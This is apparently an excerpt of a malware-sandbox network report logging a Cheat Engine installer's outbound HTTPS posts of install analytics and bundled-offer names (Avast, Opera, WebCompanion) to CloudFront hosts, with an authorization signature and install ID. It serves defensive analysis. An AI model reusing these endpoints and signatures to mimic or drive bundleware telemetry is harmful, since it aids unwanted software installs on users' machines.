                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: ooujTBMn_udJT3m4OS1tq6V-d5PtAoPLWMe7QNL3f-MmBZIJrVhZmA==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.54972665.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:26 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 388
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:26 UTC388OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 41 76 61 73 74 5f 4e 43 48 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 41 76 61 73 74 5f 4e 43 48 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 32
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Avast_NCH\",\"18\":\"ZB_Avast_NCH\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"2
                                                                                                                                                                                                                                    2024-12-28 21:20:27 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:27 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 5cb640bbbaa55dec4a9f2ef093c54cf4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: CfmIPuzIwfHlhWDTS5ihUhhxWtThC6N4sVz5jFY1mjZLOXATZRpeUQ==
                                                                                                                                                                                                                                    2024-12-28 21:20:27 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.54973713.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:28 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 443
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:28 UTC443OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:30 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:29 GMT
                                                                                                                                                                                                                                    Via: 1.1 0e7c1faba1392f39c179bd78da48eb4e.cloudfront.net (CloudFront), 1.1 2d4a1087f3ef25ab8e6dac5fe05a063e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: FWGwaSoo851uvYTYbGgjan5vA6c8D03ttGnH4mCBxerzLC3tD09aIg==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.54974365.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:32 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:32 UTC419OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 52 61 7a 65 72 5f 43 6f 72 74 65 78 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 52 61 7a 65 72 5f 43 6f 72 74 65 78 5f 76 31 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Razer_Cortex\",\"18\":\"ZB_Razer_Cortex_v1\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",
                                                                                                                                                                                                                                    2024-12-28 21:20:33 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:32 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 3440b79c112e9514e3e6f25a7439db3c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: ZmOKqKg_zBtXffnaqc41OxLIhodY7_XA1gdPdmvdfKpLlne-G8MOjQ==
                                                                                                                                                                                                                                    2024-12-28 21:20:33 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.54974913.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:34 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:34 UTC474OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:36 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:35 GMT
                                                                                                                                                                                                                                    Via: 1.1 00ea1e24e0d1a38e8abfc94f7cd21846.cloudfront.net (CloudFront), 1.1 759e09affff41285e9585e1a31532bd4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: Hvqt8b_4ZXjbUmwGQjT5mTno25s4BoNPJvxlP4sElzzfE6dXqkAJQA==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    11192.168.2.54975965.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:38 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 401
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:38 UTC401OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 43 6f 6d 70 61 6e 69 6f 6e 43 48 4f 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 43 43 48 4f 5f 6e 65 77 5f 49 53 56 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WebCompanionCHO\",\"18\":\"ZB_WCCHO_new_ISV\",\"19\":\"pac_241007\",\"21\":\"1707gdip\"
                                                                                                                                                                                                                                    2024-12-28 21:20:39 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:38 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 c71f0b857dc0e27dad67e2b7cd440f10.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: CnFuWT9EUFVBwVTAWqvGhCNV63SN6DWJBO_LFhohlC0lokjIXok46g==
                                                                                                                                                                                                                                    2024-12-28 21:20:39 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    12192.168.2.54976613.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:40 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 456
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:40 UTC456OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:41 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:41 GMT
                                                                                                                                                                                                                                    Via: 1.1 ab5a0b129a46042ccb6b286f29e7940c.cloudfront.net (CloudFront), 1.1 d5d5fbb221d1e1e64574f5113ce6ed5c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: axxMKdCx95Un_WwlzHfkU0Ojn2hd02wHzbhxaEm7q_wR1KiIshx3Ww==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    13192.168.2.54977265.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:44 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 418
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:44 UTC418OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 4f 70 65 72 61 5f 72 65 65 6e 67 61 67 65 64 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 4f 70 65 72 61 5f 72 65 5f 56 33 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Opera_reengaged\",\"18\":\"ZB_Opera_re_V3\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\
                                                                                                                                                                                                                                    2024-12-28 21:20:45 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:44 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: 0QoV6ht9g5nzsUtXQkJyCP8eux7zPaEkwcuNQS-uZmoKI0EByeBQMg==
                                                                                                                                                                                                                                    2024-12-28 21:20:45 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    14192.168.2.54977813.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:46 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 473
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:46 UTC473OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:47 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:47 GMT
                                                                                                                                                                                                                                    Via: 1.1 759e09affff41285e9585e1a31532bd4.cloudfront.net (CloudFront), 1.1 a8d6fe7391dc1997a312e8d585f06950.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: AxIkteg9VpikJaQ3KeMmm_LtrRUfj5fztBz44A-D7bWiG-69cxJhRw==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    15192.168.2.54978465.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:49 UTC140OUTGET /f/WeatherZero/images/969/EN.png HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:50 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                    Content-Length: 30586
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Last-Modified: Thu, 08 Dec 2022 12:37:43 GMT
                                                                                                                                                                                                                                    x-amz-version-id: MVrTExmvEQAJj6fAGLSH_gwH63ab4qxc
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:03:57 GMT
                                                                                                                                                                                                                                    ETag: "9ac6287111cb2b272561781786c46cdd"
                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
